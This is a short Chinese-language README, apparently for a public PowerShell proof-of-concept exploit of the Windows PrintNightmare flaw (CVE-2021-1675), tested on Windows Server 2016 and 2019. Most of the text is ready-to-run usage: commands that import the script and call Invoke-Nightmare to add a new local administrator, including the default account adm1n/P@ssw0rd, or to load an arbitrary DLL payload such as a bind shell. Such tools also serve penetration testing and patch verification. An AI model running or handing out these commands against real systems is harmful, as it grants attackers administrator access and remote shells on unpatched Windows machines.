Caleb Stewart | John Hammond | 2021年7月1日
CVE-2021-1675 是一个关键的远程代码执行和本地权限提升漏洞,被称为“PrintNightmare”。
远程代码执行的概念验证利用代码已经发布(Python、C++),本地权限提升则有一个 C#版本。我们尚未看到纯 PowerShell 的原生实现,因此希望尝试精炼和重构此利用代码。
该 PowerShell 脚本利用 PrintNightmare 攻击技术执行本地权限提升(LPE)。

已在 Windows Server 2016 和 Windows Server 2019 上测试。
默认向本地管理员组添加新用户:
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # 默认将用户 `adm1n`/`P@ssw0rd` 添加到本地管理员组
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
提供自定义 DLL 负载,以执行其他任何操作。
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"